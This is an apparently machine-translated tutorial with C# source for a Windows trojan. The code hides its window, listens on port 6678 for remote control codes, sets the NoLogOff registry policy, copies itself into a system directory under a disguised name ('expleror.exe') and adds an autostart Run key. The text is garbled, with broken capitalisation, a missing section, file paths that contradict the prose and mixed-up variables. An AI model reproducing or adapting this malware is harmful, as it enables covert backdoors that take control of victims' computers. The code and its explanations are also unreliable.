Use C # To implement the trojan program

To implement the trojan service program, we mainly implement the following functions: running the background (hiding technology), receiving the control code, and modifying the Registry. We will introduce these three aspects:



Private void InitializeComponent ()
{
//
// Form1
//
// Start point and size of the form display
This. AutoScaleBaseSize = new System. Drawing. Size (6, 14 );
This. ClientSize = new System. Drawing. Size (368,357 );
// Form name
This. Name = "Form1 ";
// Set properties to run on the background
This. ShowInTaskbar = false;
This. Text = "Form1 ";
This. WindowState = System. Windows. Forms. FormWindowState. Minimized;
}
2. Control the receipt of code. It must be started when the service program starts. Therefore, the listening thread must be started during program initialization. Therefore, it is placed in the form constructor. The code annotation is as follows:

{
//
// Required for Windows Form Designer support
//
InitializeComponent ();

// TODO: add Any constructor code after InitializeComponent calls
// Add your listening code
// You can set the port. I have used a fixed port.
Int port = 6678;
// System. Net. Sockets. TcpListener is used to listen to the client in the Tcp network.
Listener = new TcpListener (port );
// Start listening
Listener. Start ();
// Add a Thread that receives control codes. To stop a Thread, Use Thread. abort ()
// ReControlCode is the function that the thread starts and executes. This function is controlled according to the received
// Select an appropriate registry modification function for the control code
Thread thread = new Thread (new ThreadStart (reControlCode ));
Thread. Start ();
}
The reControlCode function is as follows. For the complete code, see the program.
Private void reControlCode ()
{
// Set the receiving socket to receive the listener. AcceptSocket to return the received client request
Socket = listener. AcceptSocket ();
// If the connection is successfully executed
While (socket. Connected)
{
// Receive control code
Byte [] by = new byte [6];
Int I = socket. Receive (by, by. Length, 0 );
String ss = System. Text. Encoding. ASCII. GetString ();
// Perform different functions based on the control code

// Modify the registry and add the Encoding
Switch (ss)
{
Case "jiance": // test connection. Test information is returned.
String str = "hjc ";
Byte [] bytee = System. Text. Encoding. ASCII. GetBytes (str );
Socket. Send (bytee, 0, bytee. Length, 0 );
Break;
Case "zx1000 ":
// Modify the registry function and define it by yourself. See the following analysis.
UnLogOff ();
// Return Control Message
RetMessage ();
Break;



Case "zx0100 ":
// Modify the registry function
UnClose ();
// Return Control Message
RetMessage ();
Break;
// The duplicate case function is the same as the previous one.
Default:
Break;
} // Case
} // While
} // Private void reControlCode

If the key value NoLogOff is set to 1 below, the computer cannot be logged out. Use C # In the following function to modify the registry:
Private void UnLogOff ()
{
// Obtain the top-level node of the host registry
Microsoft. Win32.RegistryKey rLocal = Registry. LocalMachine;
// Set a registry subkey variable
RegistryKey key1;
Try
{
// Function RegistryKey. OpenSubkey (string registrykey, bool canwrite)
// Registrykey is the key value specified by the user. If canwrite is set to true, it can be modified. The default value is fasle.
Key1 =
RLocal. OpenSubKey ("SOFTWARE // Microsoft // Windows // CurrentVersion // Policies // Explorer", true );
// Set the key name and value of the subkey
Key1.SetValue ("NoLogOff", 1 );
// Close the opened sub-Key
Key1.Close ();
// Set the warning string
Mystr = mystr + "HKEY_LOCAL_MACHINE // SOFTWARE // Microsoft // Windows // CurrentVersion // Policies // Explorer key value Nologoff is modified! Set it to 0! ";
}
Catch {}
// If there is no self-created
If (key1 = null)
{
Try
{
// Use the RegistryKey. CreateSubKey (string mystring) function to create the required sub-Key
RegistryKey key2 = rLocal. CreateSubKey ("SOFTWARE/Microsoft // Windows // CurrentVersion // Policies // Explorer ");
Key2.SetValue ("NoLogOff", 1 );
Key2.Close ();
Mystr = mystr + "HKEY_LOCAL_MACHINE // SOFTWARE // Microsoft // Windows // CurrentVersion // Policies // Explorer key value Nologoff is modified! Set it to 0! ";
}
Catch {}
}
}
4. Another important function in trojan programs is self-replication and transfer. When a trojan is introduced to a controlled host, it must be automatically hidden in the System and System32 directories to prevent the trojan from being detected. The transfer code is analyzed as follows. The main function is to transfer the trojan program on drive d to C: // winnnt // system // msdoss.exe and change the name. The. NET namespace System. IO is used to allow synchronous and asynchronous reading and writing of data streams and files. Here we use the System. IO. File class.
Private void moveCC1 ()
{
Try
{
// Function File. Move (string sourceFileName, string destFileName) to Move a File
// SourceFileName is the name of the file to be moved, and destFileName is the new path of the file.
File. Move ("C: // winnnt // system // msdoss.exe", "d: // winnt // system32 // expleror.exe ");
}
Catch {}
// Set the new Trojan to self-start. The analysis is the same as the previous one.
Try
{
Key1 = rLocal. OpenSubKey ("SOFTWARE // Microsoft // Windows // CurrentVersion // Run", true );
Key1.SetValue ("microsoftt", "d: // winnt // system32 // expleror.exe ");
Key1.Close ();
}
Catch {}
If (key1 = null)
{
Try
{
RegistryKey key2 = rLocal. CreateSubKey ("SOFTWARE/Microsoft // Windows // CurrentVersion // Run ");
Key1.SetValue ("microsoftt", "d: // winnt // system32 // expleror.exe ");
Key1.Close ();
}
Catch {}
}
} // MoveCC1 ()